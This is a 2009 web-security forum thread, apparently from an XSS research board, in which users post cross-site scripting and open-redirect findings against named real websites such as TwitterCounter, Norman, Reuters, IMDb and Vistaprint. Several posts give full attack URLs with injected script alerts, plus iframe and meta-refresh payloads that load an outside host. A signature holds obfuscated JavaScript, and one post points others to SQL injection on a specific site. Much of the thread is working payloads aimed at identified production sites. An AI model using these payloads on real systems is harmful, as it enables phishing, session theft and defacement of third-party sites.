PaPPy Wrote:
-------------------------------------------------------
> -dont know if i can turn this into XSS
> [www.us.hsbc.com]
> CSM0000841&x=&code=CSM0000841&WT.ac=HBUS_CSM000084
> 1&rmax=http://google.com

[www.us.hsbc.com]

i tried that, and it doesnt seem to work... and neither does urs
i am using IE7

[www.xssed.com]

[sports.sportsillustrated.cnn.com]
[sports.sportsillustrated.cnn.com]

and an open direction
[sportsillustrated.cnn.com]

anyone able to get something from this?
[www.e-publishing.af.mil];

[mlb.mlb.com]

[www.mysanantonio.com]

[weather.mysanantonio.com];

[www.delta.com]

weird way i had to pull this one off, had some filters
[www.delta.com]

[www.delta.com]

[www.delta.com];

[www.delta.com];

and this one is commical
[search.chow.com]

[www.xssed.com]



Edited 12 time(s). Last edit at 06/03/2009 03:08PM by PaPPy.

TwitterCounter.com xss - iframe - redirect

http://twittercounter.com/milw0rm?predicted="><script>alert(String.fromCharCode(88,83,83))</script>

http://twittercounter.com/milw0rm?predicted="<IMG src='http://nemesis.te-home.net'><BR><BR><IFRAME width='1000%' height='400px' src='http://nemesis.te-home.net'>

http://twittercounter.com/trendmicro?predicted="<META HTTP-EQUIV="refresh" content="0; URL=http://nemesis.te-home.net">

Norman

xss,iframe

http://www.norman.com/support/support_issue_archive/67744/en?msg:utf8:ustring="><script>alert(String.fromCharCode(88,83,83))</script>

http://www.norman.com/site_search/en?searchString%3Autf8%3Austring="><iframe src=index.htm

http://www.norman.com/support/support_issue_archive/67744/en?msg:utf8:ustring="<IMG src='http://nemesis.te-home.net'><BR><BR><IFRAME width='250%' height='600px' src='http://nemesis.te-home.net'>

[nemesis.te-home.net]

[www.airfrance.us]
[www.airfrance.us]
[eshopping.airfrance.fr];
[www.airfrance.com]
[www.airfrance.fr]
[www.airfrance.ca]
[www.airfrance.pt]
[www.airfrance.it]
[www.airfrance.it]
[www.airfrance.co.jp]
[w3.airfrance.com]
[www.airfrance.be]
[www.airfrance.fr]
[www.airfrance.com.cn]
[www.airfrance.at]
[www.airfrance.com.br]
[www.airfrance.nl]

[www.icelandair.us];
[www.bluenity.com];
[www.bluenity.fr];

[www.ucf.edu];
[search.honeywell.com]
[www.wired.com];
[secure.wired.com];
[magazine.wired.com]

[www.xssed.com]



Edited 24 time(s). Last edit at 06/23/2009 08:05AM by PaPPy.

Playmate 2009
[www.playboy.de]

@Reiners Research - right? Both the website and the image :)

---
g:0in~/*for another*/~alert(!!1)
(Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç[È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å)
me || PHPIDS || Twitter || <malicious></markup>

I knew you would be the first one clicking on the link ;)

i was going to click it, but at work....

[www.xssed.com]

@Reiners well parried :)

---
g:0in~/*for another*/~alert(!!1)
(Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç[È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å)
me || PHPIDS || Twitter || <malicious></markup>

[photobucket.com];


hxxp://funds.reuters.com/lipper/retail/reuters/overview.asp?type=";} alert(1); //"></iframe><script>alert(0);</script>
hxxp://funds.reuters.com/lipper/retail/reuters/overviewetf.asp?type=";} alert(1); //"></iframe><script>alert(0);</script>
hxxp://funds.reuters.com/lipper/retail/reuters/fundscreener.asp?type=";} alert(1); //"></iframe><script>alert(0);</script>
hxxp://funds.reuters.com/lipper/retail/reuters/lipperperformingfunds.asp?type=";}%20alert(1);%20//"></a></iframe><script>alert(0);</script>
hxxp://www.reuters.com/do/emailArticle?articleId="><script>alert(1);</script><!--

hxxp://www.imdb.com/name/nm1083271/mediaindex?page=2"></a><script>alert(1);</script>

[www.xssed.com]



Edited 4 time(s). Last edit at 07/01/2009 01:17PM by PaPPy.

Too easy and quite pointless, but it works:

[www.thebiogrid.org]

[www.webmd.com]
[pref.health.webmd.com]
[www.webmd.com]
[www.webmd.com]
[www.webmd.com]
[www.webmd.com]
[www.webmd.com]
[www.webmd.com]
[www.webmd.com]
[www.webmd.com]
[www.webmd.com]

[v5.globalmentoring.com]
also if you register for a free demo here,
[v5.globalmentoring.com]
you can access other resources via navigating here
[v5.globalmentoring.com]
site also has sql injections, and profile fields can accept XSS

So go get your learn on!

[www.xssed.com]



Edited 2 time(s). Last edit at 07/15/2009 08:34AM by PaPPy.

[www.pcworld.com]

[www.xssed.com]

[www.nice.org.uk]
[india.gov.in]

Don't ask me why I was at this website

[www.pampers.com]

---
$emo=addslashes($wrist);

[www.vistaprint.com];

[www.vistaprint.com]

hxxp://www.vistaprint.com/vp/ns/setlanguage.aspx?langid=15&xnav=top&returl=javascript:alert(1);"><script>alert(1);</script><!--


hxxp://www.vistaprint.com/vp/calendars/calendar_options.aspx?alt_doc_id=04608-16821-5N8&combo="></a><script>alert(1);</script><!--20120.134.23.67396|67396%2c67396%2c67396%2c67396%2c67396%2c67396%2c67396%2c67396%2c67396%2c67396%2c67396%2c67396%2c83487|670|0|68&tabStep=0&CalendarDatePicked=False&combo_id=69997&pf_id=389&rd=3

and an open redirect
[www.vistaprint.com]

[www.xssed.com]

[friends.myspace.com]

cant take credit for this one, found this on another site:
[kr.gugi.yahoo.com]

[www.xssed.com]



Edited 1 time(s). Last edit at 10/05/2009 08:51AM by PaPPy.

every forum they host
[help.forumotion.com]

[www.xssed.com]

[linktown.kens5.com]

[www.woai.com]

[www.informationweek.com];

[www.xssed.com]



Edited 3 time(s). Last edit at 11/12/2009 01:20PM by PaPPy.

[us.blizzard.com]

[www.ua2go.com];

[euronews.com];

[thatwebstuff.com];

[www.media-hunt.com];

[www.xssed.com]



Edited 3 time(s). Last edit at 11/19/2009 03:14PM by PaPPy.

[www.conceptart.org]

[www.justanotherhacker.com]

[shop.three.com.au]";</script><script>alert('ZOMBIES AHEAD!');</script><&_requestid=542403

[www.justanotherhacker.com]

Oh lol.. I borked the forum... let me urlencode that for you

[shop.three.com.au]

[www.justanotherhacker.com]

[search.news.com.au]

[www.justanotherhacker.com]

[www.carsguide.com.au]

[www.justanotherhacker.com]

[www.reuters.com]

[www.justanotherhacker.com]

[politics.inquirer.net]

[www.xssed.com]